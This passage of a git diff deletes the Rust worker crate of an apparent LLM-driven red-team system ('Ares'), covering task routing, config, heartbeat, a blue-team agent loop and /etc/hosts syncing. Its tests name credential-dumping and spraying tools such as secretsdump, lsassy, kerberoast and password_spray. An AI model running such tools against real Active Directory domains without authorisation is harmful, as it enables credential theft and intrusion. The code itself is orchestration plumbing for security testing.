credential_access should route to recon - assert_eq!( - resolve_queue_role("credential_access", "password_spray"), - "recon" - ); - assert_eq!( - resolve_queue_role("credential_access", "username_as_password"), - "recon" - ); - assert_eq!( - resolve_queue_role("credential_access", "ldap_search_descriptions"), - "recon" - ); - assert_eq!( - resolve_queue_role("credential_access", "gpp_password_finder"), - "recon" - ); - assert_eq!( - resolve_queue_role("credential_access", "sysvol_script_search"), - "recon" - ); - assert_eq!( - resolve_queue_role("credential_access", "laps_dump"), - "recon" - ); - assert_eq!( - resolve_queue_role("credential_access", "smbclient_spider"), - "recon" - ); - assert_eq!( - resolve_queue_role("credential_access", "password_policy"), - "recon" - ); -} - -#[test] -fn test_cross_role_routing_native_tools_stay() { - // Tools native to credential_access should stay on credential_access - assert_eq!( - resolve_queue_role("credential_access", "secretsdump"), - "credential_access" - ); - assert_eq!( - resolve_queue_role("credential_access", "kerberoast"), - "credential_access" - ); - assert_eq!( - resolve_queue_role("credential_access", "lsassy"), - "credential_access" - ); -} - -#[test] -fn test_cross_role_routing_recon_stays_recon() { - // When recon itself calls these tools, they stay on 
recon - assert_eq!(resolve_queue_role("recon", "password_spray"), "recon"); - assert_eq!(resolve_queue_role("recon", "nmap_scan"), "recon"); - assert_eq!( - resolve_queue_role("recon", "ldap_search_descriptions"), - "recon" - ); -} diff --git a/ares-worker/Cargo.toml b/ares-worker/Cargo.toml deleted file mode 100644 index 35432364..00000000 --- a/ares-worker/Cargo.toml +++ /dev/null @@ -1,33 +0,0 @@ -[package] -name = "ares-worker" -version = "0.1.0" -edition = "2021" -description = "Worker binary for Ares red team multi-agent system" - -[[bin]] -name = "ares-worker" -path = "src/main.rs" - -[features] -default = ["blue"] -blue = ["ares-core/blue", "ares-llm/blue", "ares-tools/blue"] - -[dependencies] -ares-core = { path = "../ares-core", features = ["telemetry"] } -ares-llm = { path = "../ares-llm" } -ares-tools = { path = "../ares-tools" } -serde = { workspace = true } -serde_json = { workspace = true } -tokio = { workspace = true } -redis = { workspace = true } -chrono = { workspace = true } -tracing = { workspace = true } -tracing-subscriber = { workspace = true } -uuid = { workspace = true } -thiserror = { workspace = true } -anyhow = { workspace = true } -async-trait = "0.1" - -[build-dependencies] -serde = { version = "1", features = ["derive"] } -serde_yaml = "0.9" diff --git a/ares-worker/build.rs b/ares-worker/build.rs deleted file mode 100644 index d64a2249..00000000 --- a/ares-worker/build.rs +++ /dev/null @@ -1,95 +0,0 @@ -//! Build script — generates `tools_for_role()` from `tools.yaml`. -//! -//! The generated file is written to `$OUT_DIR/tool_tables.rs` and -//! included by `tool_check.rs` via `include!`. - -use std::collections::BTreeMap; -use std::env; -use std::fs; -use std::io::Write; -use std::path::Path; - -use serde::Deserialize; - -#[derive(Deserialize)] -struct ToolsFile { - roles: BTreeMap, -} - -#[derive(Deserialize)] -struct RoleDef { - tools: Vec, -} - -#[derive(Deserialize)] -struct ToolCategory { - binaries: Vec, -} - -fn main() { - let manifest_dir = env::var("CARGO_MANIFEST_DIR").unwrap(); - let yaml_path = Path::new(&manifest_dir) - .parent() // workspace root - .unwrap() - .join("tools.yaml"); - - println!("cargo::rerun-if-changed={}", yaml_path.display()); - - let yaml_content = fs::read_to_string(&yaml_path).unwrap_or_else(|e| { - panic!("Failed to read {}: {e}", yaml_path.display()); - }); - - let tools_file: ToolsFile = serde_yaml::from_str(&yaml_content).unwrap_or_else(|e| { - panic!("Failed to parse {}: {e}", yaml_path.display()); - }); - - let out_dir = env::var("OUT_DIR").unwrap(); - let dest = Path::new(&out_dir).join("tool_tables.rs"); - let mut f = fs::File::create(&dest).unwrap(); - - // Generate WORKER_ROLES constant (used in tests). - let role_names: Vec<&str> = tools_file.roles.keys().map(|s| s.as_str()).collect(); - writeln!(f, "/// All worker roles that have tool requirements.").unwrap(); - writeln!(f, "#[cfg(test)]").unwrap(); - writeln!(f, "const WORKER_ROLES: &[&str] = &[").unwrap(); - for role in &role_names { - writeln!(f, " {role:?},").unwrap(); - } - writeln!(f, "];\n").unwrap(); - - // Generate tools_for_role(). - writeln!( - f, - "/// Tools expected on each worker role's container image." - ) - .unwrap(); - writeln!(f, "///").unwrap(); - writeln!( - f, - "/// Auto-generated from `tools.yaml` — do not edit by hand." 
- ) - .unwrap(); - writeln!( - f, - "fn tools_for_role(role: &str) -> &'static [&'static str] {{" - ) - .unwrap(); - writeln!(f, " match role {{").unwrap(); - - for (role, def) in &tools_file.roles { - let binaries: Vec<&str> = def - .tools - .iter() - .flat_map(|cat| cat.binaries.iter().map(|s| s.as_str())) - .collect(); - writeln!(f, " {role:?} => &[").unwrap(); - for bin in &binaries { - writeln!(f, " {bin:?},").unwrap(); - } - writeln!(f, " ],").unwrap(); - } - - writeln!(f, " _ => &[],").unwrap(); - writeln!(f, " }}").unwrap(); - writeln!(f, "}}").unwrap(); -} diff --git a/ares-worker/src/blue_task_loop.rs b/ares-worker/src/blue_task_loop.rs deleted file mode 100644 index 5aecd3bd..00000000 --- a/ares-worker/src/blue_task_loop.rs +++ /dev/null @@ -1,385 +0,0 @@ -//! Blue team task consumption loop. -//! -//! Consumes tasks from `ares:blue:tasks:global:{role}`, runs the blue -//! team LLM agent loop with appropriate tools, and pushes results back -//! to `ares:blue:results:{task_id}`. -//! -//! This parallels the red team `task_loop` but uses: -//! - Blue task queue keys (`ares:blue:tasks:*`) -//! - Blue tool definitions from `ares_llm::tool_registry::blue` -//! - Blue prompt templates -//! - Blue state writer for investigation state mutations -//! - HTTP-based tools (Loki, Prometheus) instead of CLI wrappers - -use std::sync::Arc; -use std::time::Duration; - -use anyhow::Result; -use tracing::{debug, error, info, warn}; - -use ares_core::state::blue_task_queue::{BlueTaskMessage, BlueTaskQueue, BlueTaskResult}; -use ares_llm::tool_registry::blue::{self, BlueAgentRole}; -use ares_llm::{run_agent_loop, AgentLoopConfig, LlmProvider, LoopEndReason, ToolDispatcher}; - -use crate::config::WorkerConfig; -use crate::heartbeat::WorkerStatus; - -/// Run the blue team task consumption loop until shutdown. -pub async fn run_blue_task_loop( - config: &WorkerConfig, - conn: redis::aio::ConnectionManager, - provider: Box, - dispatcher: Arc, - model_name: String, - status_tx: tokio::sync::watch::Sender, - shutdown: Arc, -) -> Result<()> { - let role = parse_blue_role(&config.worker_role); - let role_str = role.as_str(); - - info!( - role = role_str, - agent = %config.agent_name, - "Starting blue team task loop" - ); - - let mut task_queue = BlueTaskQueue::from_conn(conn); - - let mut retry_delay = Duration::from_secs(1); - let max_retry_delay = Duration::from_secs(60); - - loop { - let poll_result = tokio::select! 
{ - result = task_queue.poll_global_task(role_str, config.poll_timeout.as_secs_f64()) => result, - _ = shutdown.notified() => { - info!("Blue task loop: shutdown signalled"); - return Ok(()); - } - }; - - match poll_result { - Ok(Some(task)) => { - retry_delay = Duration::from_secs(1); - - let _ = status_tx.send(WorkerStatus { - status: "busy".to_string(), - current_task: Some(task.task_id.clone()), - }); - - // Send blue team heartbeat - let _ = task_queue - .send_heartbeat( - &config.agent_name, - "busy", - Some(&task.task_id), - role_str, - Some(&task.investigation_id), - ) - .await; - - // Execute the blue team task - let result = execute_blue_task( - &task, - role, - provider.as_ref(), - Arc::clone(&dispatcher), - &model_name, - &config.agent_name, - ) - .await; - - // Push result - if let Err(e) = task_queue.send_result(&result).await { - error!( - task_id = %task.task_id, - err = %e, - "Failed to send blue task result" - ); - } - - let _ = status_tx.send(WorkerStatus { - status: "idle".to_string(), - current_task: None, - }); - - let _ = task_queue - .send_heartbeat( - &config.agent_name, - "idle", - None, - role_str, - Some(&task.investigation_id), - ) - .await; - } - Ok(None) => { - retry_delay = Duration::from_secs(1); - } - Err(e) => { - let error_str = e.to_string().to_lowercase(); - let is_conn_error = ["connection", "closed", "timeout", "broken", "reset"] - .iter() - .any(|kw| error_str.contains(kw)); - - if is_conn_error { - warn!( - delay_secs = retry_delay.as_secs(), - "Blue task loop: connection error, retrying: {e}" - ); - tokio::select! { - _ = tokio::time::sleep(retry_delay) => {} - _ = shutdown.notified() => return Ok(()), - } - retry_delay = (retry_delay * 2).min(max_retry_delay); - } else { - error!("Blue task loop: non-connection error: {e}"); - tokio::select! { - _ = tokio::time::sleep(Duration::from_secs(5)) => {} - _ = shutdown.notified() => return Ok(()), - } - retry_delay = Duration::from_secs(1); - } - } - } - } -} - -/// Execute a single blue team task through the LLM agent loop. 
-async fn execute_blue_task( - task: &BlueTaskMessage, - role: BlueAgentRole, - provider: &dyn LlmProvider, - dispatcher: Arc, - model_name: &str, - agent_name: &str, -) -> BlueTaskResult { - info!( - task_id = %task.task_id, - task_type = %task.task_type, - role = role.as_str(), - investigation_id = %task.investigation_id, - "Executing blue team task" - ); - - // Build tools for this role - let tools = blue::blue_tools_for_role(role); - let capabilities: Vec = tools - .iter() - .filter(|t| !blue::is_blue_callback_tool(&t.name)) - .map(|t| t.name.clone()) - .collect(); - - // Build system prompt - let system_prompt = - match ares_llm::prompt::blue::build_blue_system_prompt(role.as_str(), &capabilities) { - Ok(p) => p, - Err(e) => { - return BlueTaskResult::failure( - &task.task_id, - &task.investigation_id, - format!("Failed to build system prompt: {e}"), - agent_name, - ); - } - }; - - // Build task prompt - // First try to load investigation state summary (best-effort) - let state_summary = "Investigation in progress.".to_string(); - - let task_prompt = match ares_llm::prompt::blue::generate_blue_task_prompt( - &task.task_type, - &task.task_id, - &task.params, - &state_summary, - ) { - Some(p) => p, - None => { - // Fallback: use raw params as prompt - format!( - "## Task: {}\n\nType: {}\nInvestigation: {}\n\nParameters:\n```json\n{}\n```\n\n\ - Complete this task and call the appropriate completion callback.", - task.task_id, - task.task_type, - task.investigation_id, - serde_json::to_string_pretty(&task.params).unwrap_or_default() - ) - } - }; - - let config = AgentLoopConfig { - model: model_name.to_string(), - max_steps: 50, - max_tool_calls_per_name: 25, - ..AgentLoopConfig::default() - }; - - // Run the agent loop - let outcome = run_agent_loop( - provider, - dispatcher, - &config, - &system_prompt, - &task_prompt, - role.as_str(), - &task.task_id, - &tools, - None, // No custom callback handler for worker tasks - ) - .await; - - // Convert outcome to BlueTaskResult - match &outcome.reason { - LoopEndReason::TaskComplete { result, .. } => { - info!( - task_id = %task.task_id, - steps = outcome.steps, - tool_calls = outcome.tool_calls_dispatched, - "Blue task completed" - ); - BlueTaskResult::success( - &task.task_id, - &task.investigation_id, - serde_json::json!({ - "summary": result, - "steps": outcome.steps, - "tool_calls": outcome.tool_calls_dispatched, - }), - agent_name, - ) - } - LoopEndReason::EndTurn { content } => BlueTaskResult::success( - &task.task_id, - &task.investigation_id, - serde_json::json!({ - "summary": content, - "steps": outcome.steps, - }), - agent_name, - ), - LoopEndReason::RequestAssistance { issue, context } => BlueTaskResult::failure( - &task.task_id, - &task.investigation_id, - format!("Assistance needed: {issue} (context: {context})"), - agent_name, - ), - LoopEndReason::MaxSteps => { - warn!(task_id = %task.task_id, steps = outcome.steps, "Blue task hit max steps"); - BlueTaskResult::failure( - &task.task_id, - &task.investigation_id, - format!("Hit max steps ({})", outcome.steps), - agent_name, - ) - } - LoopEndReason::MaxTokens => BlueTaskResult::failure( - &task.task_id, - &task.investigation_id, - "Hit max tokens".into(), - agent_name, - ), - LoopEndReason::Error(err) => { - error!(task_id = %task.task_id, err = %err, "Blue task error"); - BlueTaskResult::failure( - &task.task_id, - &task.investigation_id, - err.clone(), - agent_name, - ) - } - } -} - -/// Parse a worker role string into a BlueAgentRole. 
-fn parse_blue_role(role: &str) -> BlueAgentRole { - match role { - "triage" => BlueAgentRole::Triage, - "threat_hunter" => BlueAgentRole::ThreatHunter, - "lateral_analyst" => BlueAgentRole::LateralAnalyst, - "escalation_triage" => BlueAgentRole::EscalationTriage, - "blue_orchestrator" => BlueAgentRole::Orchestrator, - _ => { - warn!(role = role, "Unknown blue team role, defaulting to Triage"); - BlueAgentRole::Triage - } - } -} - -/// Blue team tool dispatcher that handles HTTP-based tools locally. -/// -/// Blue team tools (Loki, Prometheus, detection queries) are HTTP-based -/// and don't need worker dispatch — they run in-process. -pub struct BlueLocalToolDispatcher; - -impl BlueLocalToolDispatcher { - pub fn new() -> Self { - Self - } -} - -#[async_trait::async_trait] -impl ToolDispatcher for BlueLocalToolDispatcher { - async fn dispatch_tool( - &self, - _role: &str, - _task_id: &str, - call: &ares_llm::ToolCall, - ) -> Result { - debug!(tool = %call.name, "Executing blue team tool locally"); - - // Check if this is a blue team HTTP tool - if ares_tools::blue::is_blue_tool(&call.name) { - match ares_tools::blue::dispatch_blue(&call.name, &call.arguments).await { - Ok(output) => { - let error = if output.success { - None - } else { - Some(output.stderr.clone()) - }; - Ok(ares_llm::ToolExecResult { - output: output.stdout, - error, - discoveries: None, - }) - } - Err(e) => Ok(ares_llm::ToolExecResult { - output: String::new(), - error: Some(e.to_string()), - discoveries: None, - }), - } - } else { - // Unknown tool - Ok(ares_llm::ToolExecResult { - output: String::new(), - error: Some(format!("Unknown blue team tool: {}", call.name)), - discoveries: None, - }) - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_parse_blue_role() { - assert_eq!(parse_blue_role("triage").as_str(), "triage"); - assert_eq!(parse_blue_role("threat_hunter").as_str(), "threat_hunter"); - assert_eq!( - parse_blue_role("lateral_analyst").as_str(), - "lateral_analyst" - ); - assert_eq!( - parse_blue_role("escalation_triage").as_str(), - "escalation_triage" - ); - assert_eq!( - parse_blue_role("blue_orchestrator").as_str(), - "blue_orchestrator" - ); - // Unknown defaults to triage - assert_eq!(parse_blue_role("unknown").as_str(), "triage"); - } -} diff --git a/ares-worker/src/config.rs b/ares-worker/src/config.rs deleted file mode 100644 index d3816b1a..00000000 --- a/ares-worker/src/config.rs +++ /dev/null @@ -1,199 +0,0 @@ -//! Worker configuration from environment variables. -//! -//! Maps to the Python config module's `get_redis_url()`, `get_agent_task_timeout()`, -//! and worker-specific env vars used in `_worker.py`. - -use std::env; -use std::time::Duration; - -/// Worker execution mode. -#[derive(Debug, Clone, PartialEq, Eq)] -pub enum WorkerMode { - /// Full task execution: consume from `ares:tasks:{role}`, expand composite - /// tasks, run tools, push results. This is the default mode used when - /// Python workers or standalone Rust workers handle entire tasks. - Task, - - /// Thin tool executor: consume individual tool calls from - /// `ares:tool_exec:{role}`, dispatch via `ares_tools::dispatch()`, push - /// results to `ares:tool_results:{call_id}`. Used when the Rust - /// orchestrator drives the LLM agent loop (ARES_LLM_MODEL). - ToolExec, - - /// Blue team task execution: consume from `ares:blue:tasks:global:{role}`, - /// run the blue team LLM agent loop with HTTP-based tools (Loki, - /// Prometheus, detection queries), push results to `ares:blue:results:`. 
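- /// Selected with `ARES_WORKER_MODE=blue_task`; only compiled when the
- /// `blue` feature is enabled.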
- #[cfg(feature = "blue")] - BlueTask, -} - -/// Worker configuration parsed from environment variables. -#[derive(Debug, Clone)] -pub struct WorkerConfig { - /// Redis connection URL (ARES_REDIS_URL). - pub redis_url: String, - - /// Worker role matching `AgentRole` values: credential_access, cracker, lateral, acl, privesc, coercion. - pub worker_role: String, - - /// Kubernetes pod name (HOSTNAME fallback). - pub pod_name: String, - - /// Logical agent name derived from role (e.g., "ares-lateral-agent"). - pub agent_name: String, - - /// Active operation ID, if known at startup. - pub operation_id: Option, - - /// Worker mode: "task" (default) or "tool_exec" (ARES_WORKER_MODE). - pub mode: WorkerMode, - - /// Maximum time for a single LLM agent task before kill (ARES_AGENT_TASK_TIMEOUT). - /// Default: 600 seconds. - pub task_timeout: Duration, - - /// Heartbeat interval — how often we refresh `ares:heartbeat:{agent}`. - /// Default: 15 seconds. - pub heartbeat_interval: Duration, - - /// Heartbeat TTL in Redis. Must be > heartbeat_interval. - /// Default: 60 seconds (matches Python's HEARTBEAT_TTL). - pub heartbeat_ttl: Duration, - - /// BLPOP timeout for polling the task queue. - /// Default: 5 seconds (matches Python's poll_task default). - pub poll_timeout: Duration, -} - -impl WorkerConfig { - /// Parse configuration from environment variables. - /// - /// Required: - /// - `ARES_REDIS_URL` — Redis connection string - /// - `ARES_WORKER_ROLE` — Worker role (credential_access, cracker, lateral, acl, privesc, coercion) - /// - /// Optional: - /// - `ARES_POD_NAME` / `HOSTNAME` — Pod name (default: "unknown") - /// - `ARES_OPERATION_ID` — Active operation ID - /// - `ARES_WORKER_MODE` — "task" (default) or "tool_exec" - /// - `ARES_AGENT_TASK_TIMEOUT` — Task timeout in seconds (default: 600) - /// - `ARES_HEARTBEAT_INTERVAL` — Heartbeat interval in seconds (default: 15) - /// - `ARES_HEARTBEAT_TTL` — Heartbeat TTL in seconds (default: 60) - /// - `ARES_POLL_TIMEOUT` — BLPOP timeout in seconds (default: 5) - pub fn from_env() -> anyhow::Result { - let redis_url = env::var("ARES_REDIS_URL") - .map_err(|_| anyhow::anyhow!("ARES_REDIS_URL is required"))?; - - let worker_role = env::var("ARES_WORKER_ROLE") - .map_err(|_| anyhow::anyhow!("ARES_WORKER_ROLE is required"))?; - - let pod_name = env::var("ARES_POD_NAME") - .or_else(|_| env::var("HOSTNAME")) - .unwrap_or_else(|_| "unknown".to_string()); - - let agent_name = format!("ares-{}-agent", worker_role.replace('_', "-")); - - let operation_id = env::var("ARES_OPERATION_ID").ok(); - - let mode = match env::var("ARES_WORKER_MODE").as_deref() { - Ok("tool_exec") => WorkerMode::ToolExec, - #[cfg(feature = "blue")] - Ok("blue_task") => WorkerMode::BlueTask, - _ => WorkerMode::Task, - }; - - let task_timeout = Duration::from_secs( - env::var("ARES_AGENT_TASK_TIMEOUT") - .ok() - .and_then(|v| v.parse::().ok()) - .unwrap_or(600), - ); - - let heartbeat_interval = Duration::from_secs( - env::var("ARES_HEARTBEAT_INTERVAL") - .ok() - .and_then(|v| v.parse::().ok()) - .unwrap_or(15), - ); - - let heartbeat_ttl = Duration::from_secs( - env::var("ARES_HEARTBEAT_TTL") - .ok() - .and_then(|v| v.parse::().ok()) - .unwrap_or(60), - ); - - let poll_timeout = Duration::from_secs( - env::var("ARES_POLL_TIMEOUT") - .ok() - .and_then(|v| v.parse::().ok()) - .unwrap_or(5), - ); - - Ok(Self { - redis_url, - worker_role, - pod_name, - agent_name, - operation_id, - mode, - task_timeout, - heartbeat_interval, - heartbeat_ttl, - poll_timeout, - }) - } -} - 
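One invariant the parser does not enforce is stated only in the doc comments: the heartbeat TTL must exceed the interval. A hedged sketch of a guard a caller might add (hypothetical helper, not part of the original code):

```rust
// Sanity-check the documented invariant: if the TTL were <= the interval,
// the heartbeat key could expire between refreshes and the orchestrator
// would wrongly consider the worker dead.
fn check_heartbeat_invariant(cfg: &WorkerConfig) {
    assert!(
        cfg.heartbeat_ttl > cfg.heartbeat_interval,
        "heartbeat TTL {:?} must exceed interval {:?}",
        cfg.heartbeat_ttl,
        cfg.heartbeat_interval
    );
}
```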
-#[cfg(test)] -mod tests { - use super::*; - - /// Combined test to avoid env var race conditions between parallel tests. - #[test] - fn from_env_all_scenarios() { - // Missing redis URL fails - std::env::remove_var("ARES_REDIS_URL"); - std::env::set_var("ARES_WORKER_ROLE", "recon"); - assert!(WorkerConfig::from_env().is_err()); - - // Missing role fails - std::env::set_var("ARES_REDIS_URL", "redis://localhost"); - std::env::remove_var("ARES_WORKER_ROLE"); - assert!(WorkerConfig::from_env().is_err()); - - // Defaults applied - std::env::set_var("ARES_WORKER_ROLE", "recon"); - std::env::remove_var("ARES_WORKER_MODE"); - let c = WorkerConfig::from_env().unwrap(); - assert_eq!(c.task_timeout, Duration::from_secs(600)); - assert_eq!(c.heartbeat_interval, Duration::from_secs(15)); - assert_eq!(c.heartbeat_ttl, Duration::from_secs(60)); - assert_eq!(c.poll_timeout, Duration::from_secs(5)); - assert!(c.operation_id.is_none()); - assert_eq!(c.mode, WorkerMode::Task); - - // Worker mode: tool_exec - std::env::set_var("ARES_WORKER_MODE", "tool_exec"); - let c = WorkerConfig::from_env().unwrap(); - assert_eq!(c.mode, WorkerMode::ToolExec); - - // Worker mode: blue_task - #[cfg(feature = "blue")] - { - std::env::set_var("ARES_WORKER_MODE", "blue_task"); - let c = WorkerConfig::from_env().unwrap(); - assert_eq!(c.mode, WorkerMode::BlueTask); - std::env::remove_var("ARES_WORKER_MODE"); - } - - // Agent name from role - std::env::set_var("ARES_WORKER_ROLE", "credential_access"); - let c = WorkerConfig::from_env().unwrap(); - assert_eq!(c.agent_name, "ares-credential-access-agent"); - assert_eq!(c.worker_role, "credential_access"); - - std::env::remove_var("ARES_REDIS_URL"); - std::env::remove_var("ARES_WORKER_ROLE"); - } -} diff --git a/ares-worker/src/heartbeat.rs b/ares-worker/src/heartbeat.rs deleted file mode 100644 index cc3cf1e9..00000000 --- a/ares-worker/src/heartbeat.rs +++ /dev/null @@ -1,155 +0,0 @@ -//! Background heartbeat task. -//! -//! Spawns a tokio task that periodically writes to `ares:heartbeat:{agent_name}` -//! with a TTL, matching the Python `_threaded_heartbeat_loop` in `_worker.py`. -//! -//! The heartbeat runs independently of the GIL-bound task loop, ensuring the -//! orchestrator always knows the worker is alive even during long Python calls. - -use std::sync::Arc; -use std::time::Duration; - -use chrono::Utc; -use redis::AsyncCommands; -use tokio::sync::watch; -use tokio::task::JoinHandle; -use tracing::{debug, warn}; - -/// Heartbeat key prefix — matches `RedisTaskQueue.HEARTBEAT_PREFIX` in Python. -const HEARTBEAT_PREFIX: &str = "ares:heartbeat"; - -/// Current worker status, shared between the task loop and heartbeat task. -#[derive(Debug, Clone)] -pub struct WorkerStatus { - /// "idle" or "busy" - pub status: String, - /// Current task ID if busy, None if idle. - pub current_task: Option, -} - -impl Default for WorkerStatus { - fn default() -> Self { - Self { - status: "idle".to_string(), - current_task: None, - } - } -} - -/// Handle to the background heartbeat task. Drop to stop. -pub struct HeartbeatHandle { - _handle: JoinHandle<()>, -} - -/// Spawn the background heartbeat loop. -/// -/// Returns a `HeartbeatHandle` (drop it or abort to stop) and a `watch::Sender` -/// the task loop uses to update current status. 
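A sketch of the intended call site follows — connection setup is elided, the agent/pod names and task ID are illustrative, and the intervals mirror the documented 15 s / 60 s defaults:

```rust
use std::sync::Arc;
use std::time::Duration;

// Hypothetical wiring: spawn the heartbeat, then flip status from the task
// loop through the returned watch sender.
async fn wire_heartbeat(conn: redis::aio::ConnectionManager) {
    let shutdown = Arc::new(tokio::sync::Notify::new());
    let (_handle, status_tx) = spawn_heartbeat(
        conn,
        "ares-recon-agent".into(),
        "recon-pod-0".into(),
        "recon".into(),
        Some("op-20260415-120000".into()),
        Duration::from_secs(15), // documented default interval
        Duration::from_secs(60), // documented default TTL
        Arc::clone(&shutdown),
    );

    // The task loop marks itself busy while a task is in flight.
    let _ = status_tx.send(WorkerStatus {
        status: "busy".into(),
        current_task: Some("recon_def456".into()),
    });
}
```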
-#[allow(clippy::too_many_arguments)] -pub fn spawn_heartbeat( - conn: redis::aio::ConnectionManager, - agent_name: String, - pod_name: String, - role: String, - operation_id: Option, - interval: Duration, - ttl: Duration, - shutdown: Arc, -) -> (HeartbeatHandle, watch::Sender) { - let (status_tx, status_rx) = watch::channel(WorkerStatus::default()); - - let handle = tokio::spawn(heartbeat_loop( - conn, - agent_name, - pod_name, - role, - operation_id, - interval, - ttl, - status_rx, - shutdown, - )); - - (HeartbeatHandle { _handle: handle }, status_tx) -} - -#[allow(clippy::too_many_arguments)] -async fn heartbeat_loop( - mut conn: redis::aio::ConnectionManager, - agent_name: String, - pod_name: String, - role: String, - operation_id: Option, - interval: Duration, - ttl: Duration, - status_rx: watch::Receiver, - shutdown: Arc, -) { - let heartbeat_key = format!("{HEARTBEAT_PREFIX}:{agent_name}"); - let ttl_secs = ttl.as_secs() as i64; - - debug!("Heartbeat: writing to {heartbeat_key} every {interval:?}"); - - let mut ticker = tokio::time::interval(interval); - ticker.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); - - loop { - tokio::select! { - _ = ticker.tick() => {} - _ = shutdown.notified() => { - // Send a final "offline" heartbeat before exiting - let data = build_heartbeat_json("offline", None, &pod_name, &role, &operation_id); - let _: Result<(), _> = redis::cmd("SET") - .arg(&heartbeat_key) - .arg(&data) - .arg("EX") - .arg(ttl_secs) - .query_async(&mut conn) - .await; - debug!("Heartbeat: shutdown, sent offline heartbeat"); - return; - } - } - - let status = status_rx.borrow().clone(); - let data = build_heartbeat_json( - &status.status, - status.current_task.as_deref(), - &pod_name, - &role, - &operation_id, - ); - - match conn - .set_ex::<_, _, ()>(&heartbeat_key, &data, ttl_secs as u64) - .await - { - Ok(()) => { - debug!("Heartbeat: {agent_name} -> {}", status.status); - } - Err(e) => { - // ConnectionManager auto-reconnects on next use - warn!("Heartbeat: Redis write failed: {e}"); - } - } - } -} - -/// Build the heartbeat JSON payload matching Python's `send_heartbeat`. -fn build_heartbeat_json( - status: &str, - current_task: Option<&str>, - pod_name: &str, - role: &str, - operation_id: &Option, -) -> String { - serde_json::json!({ - "status": status, - "current_task": current_task, - "pod_name": pod_name, - "role": role, - "operation_id": operation_id, - "timestamp": Utc::now().to_rfc3339(), - }) - .to_string() -} diff --git a/ares-worker/src/hosts.rs b/ares-worker/src/hosts.rs deleted file mode 100644 index c021f2ed..00000000 --- a/ares-worker/src/hosts.rs +++ /dev/null @@ -1,238 +0,0 @@ -//! Background `/etc/hosts` management for AD hostname resolution. -//! -//! In Active Directory environments, Kerberos authentication requires hostname -//! resolution. Workers need to resolve DC names and other AD hosts. This module -//! periodically reads discovered hosts from Redis and appends new entries to -//! `/etc/hosts`. -//! -//! For domain controllers, the bare domain name is also added as an alias to -//! enable Kerberos realm resolution (e.g., `192.168.58.10 dc01.contoso.local dc01 contoso.local`). - -use std::collections::HashSet; -use std::sync::Arc; -use std::time::Duration; - -use redis::aio::ConnectionManager; -use redis::AsyncCommands; -use tracing::{debug, info, warn}; - -use ares_core::models::Host; - -/// Interval between host sync cycles. 
-const SYNC_INTERVAL: Duration = Duration::from_secs(30); - -/// Build the `/etc/hosts` entries for a list of discovered hosts. -/// -/// Returns `(entries, new_written_ips)` — the formatted lines and which IPs -/// were included (for dedup tracking). -pub fn build_host_entries(hosts: &[Host], already_written: &HashSet) -> Vec { - let mut entries = Vec::new(); - - for host in hosts { - if host.ip.is_empty() || host.hostname.is_empty() { - continue; - } - if already_written.contains(&host.ip) { - continue; - } - - let hostname = host.hostname.to_lowercase(); - let parts: Vec<&str> = hostname.split('.').collect(); - let short_name = parts.first().copied().unwrap_or(&hostname); - - // Build aliases: FQDN, short name, and bare domain for DCs - let mut aliases = vec![hostname.clone()]; - if short_name != hostname { - aliases.push(short_name.to_string()); - } - - // For domain controllers, add bare domain for Kerberos realm resolution - if host.is_dc && parts.len() >= 2 { - let domain = parts[1..].join("."); - if !domain.is_empty() { - aliases.push(domain); - } - } - - entries.push(format!("{} {}", host.ip, aliases.join(" "))); - } - - entries -} - -/// Write new host entries to `/etc/hosts`. -/// -/// Appends entries in a single write to minimize race conditions. -/// Returns the set of IPs that were successfully written. -fn write_etc_hosts(entries: &[String], agent_name: &str) -> HashSet { - use std::io::Write; - - let mut written = HashSet::new(); - - if entries.is_empty() { - return written; - } - - match std::fs::OpenOptions::new().append(true).open("/etc/hosts") { - Ok(mut f) => { - let mut buf = format!("\n# Ares discovered hosts ({agent_name})\n"); - for entry in entries { - buf.push_str(entry); - buf.push('\n'); - // Extract IP from "IP hostname ..." format - if let Some(ip) = entry.split_whitespace().next() { - written.insert(ip.to_string()); - } - } - if let Err(e) = f.write_all(buf.as_bytes()) { - warn!("Cannot write to /etc/hosts: {e}"); - return HashSet::new(); - } - info!( - count = entries.len(), - agent = agent_name, - "Updated /etc/hosts" - ); - for entry in entries { - debug!("Added hosts entry: {entry}"); - } - } - Err(e) => { - warn!("Cannot open /etc/hosts for append: {e}"); - } - } - - written -} - -/// Spawn a background task that periodically syncs hosts from Redis to `/etc/hosts`. -/// -/// Requires an operation ID to know which Redis key to read from. -/// Returns the join handle. -pub fn spawn_hosts_sync( - conn: ConnectionManager, - operation_id: String, - agent_name: String, - shutdown: Arc, -) -> tokio::task::JoinHandle<()> { - tokio::spawn(async move { - let mut conn = conn; - let mut written_ips: HashSet = HashSet::new(); - - let hosts_key = format!("ares:op:{operation_id}:hosts"); - info!(key = %hosts_key, "Starting /etc/hosts sync background task"); - - loop { - tokio::select! 
{ - _ = tokio::time::sleep(SYNC_INTERVAL) => {} - _ = shutdown.notified() => { - debug!("hosts_sync: shutdown signalled"); - return; - } - } - - // Read hosts from Redis - let hosts_json: Vec = match conn.lrange(&hosts_key, 0, -1).await { - Ok(h) => h, - Err(e) => { - debug!("hosts_sync: Redis read failed: {e}"); - continue; - } - }; - - let hosts: Vec = hosts_json - .iter() - .filter_map(|json| serde_json::from_str(json).ok()) - .collect(); - - let entries = build_host_entries(&hosts, &written_ips); - if !entries.is_empty() { - let newly_written = write_etc_hosts(&entries, &agent_name); - written_ips.extend(newly_written); - } - } - }) -} - -// ─── Tests ────────────────────────────────────────────────────────────────── - -#[cfg(test)] -mod tests { - use super::*; - - fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host { - Host { - ip: ip.to_string(), - hostname: hostname.to_string(), - os: String::new(), - roles: Vec::new(), - services: Vec::new(), - is_dc, - owned: false, - } - } - - #[test] - fn test_build_host_entries_basic() { - let hosts = vec![ - make_host("192.168.58.10", "dc01.contoso.local", true), - make_host("192.168.58.22", "ws01.contoso.local", false), - ]; - let entries = build_host_entries(&hosts, &HashSet::new()); - assert_eq!(entries.len(), 2); - // DC entry should have FQDN, short name, and domain - assert_eq!( - entries[0], - "192.168.58.10 dc01.contoso.local dc01 contoso.local" - ); - // Non-DC entry should have FQDN and short name only - assert_eq!(entries[1], "192.168.58.22 ws01.contoso.local ws01"); - } - - #[test] - fn test_build_host_entries_dedup() { - let hosts = vec![make_host("192.168.58.10", "dc01.contoso.local", true)]; - let mut already_written = HashSet::new(); - 